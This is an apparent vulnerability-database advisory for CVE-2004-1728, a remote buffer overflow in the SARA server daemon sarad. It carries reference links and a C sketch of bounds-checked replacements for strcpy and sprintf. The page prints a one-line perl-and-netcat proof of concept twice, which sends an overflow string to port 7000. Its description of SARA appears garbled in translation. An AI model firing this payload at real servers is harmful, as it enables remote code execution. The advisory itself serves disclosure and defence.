SARA Server Remote Buffer Overflow Vulnerability

Vulnerability ID: 1108063
Vulnerability type: Boundary condition error
Published: 2004-07-20
Updated: 2005-10-20
CVE ID: CVE-2004-1728
CNNVD-ID: CNNVD-200408-203
Platform: Multiple
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/24386
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200408-203
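|Vulnerability details
SARA Server is a service program of the British National campus network. SARA Server contains multiple buffer overflows that a remote attacker may be able to exploit to execute arbitrary instructions on the system with the privileges of the process. Submitting a malformed request like the following can cause a buffer overflow in the program: perl -e 'print "SUCK" x 11; print chr foreach(0x90,0xdb,0x14,0x40,0);' | netcat victim 7000. Carefully constructed input may execute arbitrary instructions on the system with the privileges of the process.
|Exploit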
source: http://www.securityfocus.com/bid/10984/info

sarad is reported prone to a buffer overflow vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data.

A remote attacker can trigger the overflow condition by supplying a large string value to the application. Arbitrary code execution is possible in the context of the server.

In addition to this issue, it is reported that various other instances of potential buffer overflow and format string vulnerabilities exist throughout the application. These issues exist due to the use of strcpy() and sprintf functions. This BID will be updated upon further analysis.

perl -e 'print "SUCK" x 11; print chr foreach(0x90,0xdb,0x14,0x40,0);' | netcat victim 7000
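
The advisory text above attributes these overflows to strcpy() and sprintf. The following C sketch is an added example, not sarad source code: it shows a length-checked copy and a truncation-checked snprintf() for a line-based request handler. The names copy_request and format_reply, the 32-byte FIELD_MAX, the "HELP" request and the reply text are all assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define FIELD_MAX 32 /* assumed size; the page does not give sarad's buffer sizes */

enum { REQ_OK = 0, REQ_TOO_LONG = -1, REQ_BAD_BYTE = -2 };

/* Bounded stand-in for strcpy(): validate a received request, then copy it.
 * dst is left untouched unless the whole request is accepted. */
int copy_request(char *dst, size_t dstsz, const unsigned char *req, size_t len)
{
    size_t i;

    while (len > 0 && (req[len - 1] == '\n' || req[len - 1] == '\r'))
        len--;                              /* strip the line terminator */
    if (dstsz == 0 || len >= dstsz)
        return REQ_TOO_LONG;                /* no room for data plus NUL */
    for (i = 0; i < len; i++)
        if (!isprint(req[i]))
            return REQ_BAD_BYTE;            /* NUL, control or 8-bit byte */
    memcpy(dst, req, len);
    dst[len] = '\0';
    return REQ_OK;
}

/* Bounded stand-in for sprintf(): constant format string, and truncation is
 * reported as an error instead of being sent on silently. */
int format_reply(char *dst, size_t dstsz, const char *field)
{
    int n = snprintf(dst, dstsz, "unknown command: %s", field);

    return (n < 0 || (size_t)n >= dstsz) ? REQ_TOO_LONG : REQ_OK;
}

int main(void)
{
    char field[FIELD_MAX], reply[64];
    unsigned char oversized[49];            /* constructed: 49 filler bytes */

    memset(oversized, 'A', sizeof oversized);
    printf("short request: %d\n",
           copy_request(field, sizeof field, (const unsigned char *)"HELP\r\n", 6));
    if (format_reply(reply, sizeof reply, field) == REQ_OK)
        puts(reply);
    printf("oversized request: %d\n",
           copy_request(field, sizeof field, oversized, sizeof oversized));
    return 0;
}
```

Passing the byte count returned by the socket read, rather than relying on a terminating NUL, is what lets the handler reject an oversized or binary request before any copy happens.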
|References

Source: XF
Name: sara-server-bo(17060)
Link: http://xforce.iss.net/xforce/xfdb/17060
Source: BID
Name: 10984
Link: http://www.securityfocus.com/bid/10984
Source: SECUNIA
Name: 12348
Link: http://secunia.com/advisories/12348
Source: BUGTRAQ
Name: 20040820 Buffer overflow in sarad
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=109308454122827&w=2
